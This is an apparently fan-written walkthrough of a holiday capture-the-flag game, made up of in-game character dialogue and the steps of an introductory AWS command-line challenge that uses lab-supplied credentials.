GLAMTARIEL’S FOUNTAIN COMPLETE

 

Akbowl - No! That's not yours! This birdbath showed me images of this happening. But I didn't believe it because nobody is better than Akbowl! Akbowl's head is the hardest! That's what the other sporcs tell me. I guess Akbowl's head is not the smartest.

 

RECOVERED WEB RING!!!

Grinchum - 😏 First lost... second lost... third lost. 😟 Where are they? 😦 WHERE ARE THEY,  preciouses? No! Aaargh! Lost! 😖 You - naggy human. Musn't bother us. 😱 Not its business! grinchum..grinchum

 

Well, at least we didn’t run into any giant spiders and Glamtariel wasn’t helping Grinchum. She was just keeping the precious Ring safe. Finally, the Third Ring of Power is ours!  We still must get these to Santa, but we need to find the other two first.  They’re too precious to leave unfound.  Why should Santa have all this power?  Why shouldn’t we keep it? We are, after all, the ones actually finding them.

 

 

 

CHAPTER 4 - THE CLOUD RING

 

Pressing on deeper still into the Subterranean Labyrinth, we come across two more Sporcs. As still as shadows, we listen. As Sporcs aren’t too overly bright, they may give us a clue to finding our next ring.

 

Brozeek - Cro! Slicmer got me on the BSRS pre-sale! Now all we gotta do is swap outfits, then you can go back in there as me. Tell Slicmer you lost your wallet key, so you made a new wallet and need to add it to the list. Then give him your wallet address, and we'll both be able to buy an NFT! Social engineering at its finest, Cro.

 

Crozag - Bro, you usually have good ideas, but this one is really terrible. Manipulating friends with social engineering isn't cool, Bro. Let's do it!

 

After learning what we could, we sneak past if we have any hopes of recovering our next ring.

 

Jill Underpole - Umm, can I help you? Me? I'm Jill Underpole, thank you very much. I'm working on this here smoke terminal. Cloud? Sure, whatever you want to call it. Anyway, you're welcome to try this out, if you think you know what you're doing. You'll have to learn some basics about the AWS command line interface (CLI) to be successful though.

 

Challenge: AWS CLI Intro - https://hhc22-wetty.kringlecon.com/?&challenge=aws101

You may not know this, but AWS CLI help messages are very easy to access. First, try typing:

$ aws help

  1. aws help

Great! When you're done, you can quit with q.

Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY, the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .

https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config

  1. Use aws configure

Excellent! To finish, please get your caller identity using the AWS command line. For more details please reference:

$ aws sts help

or reference:https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/index.html

  1. Use aws sts get-caller-identity

 

AWS CLI INTRO COMPLETE

Jill Underpole - Wait, you got it done, didn't you? Ok, consider me impressed. You could probably help Gerty, too. The first trick'll be running the Trufflehog tool. It's as good at sniffing out secrets as I am at finding mushrooms! After that, it's just a matter of getting to the secret the tool found. I'd bet a basket of portobellos you'll get this done!

 

Fifth Hidden Chest - Keep going left then up then left again to reach the next secret chest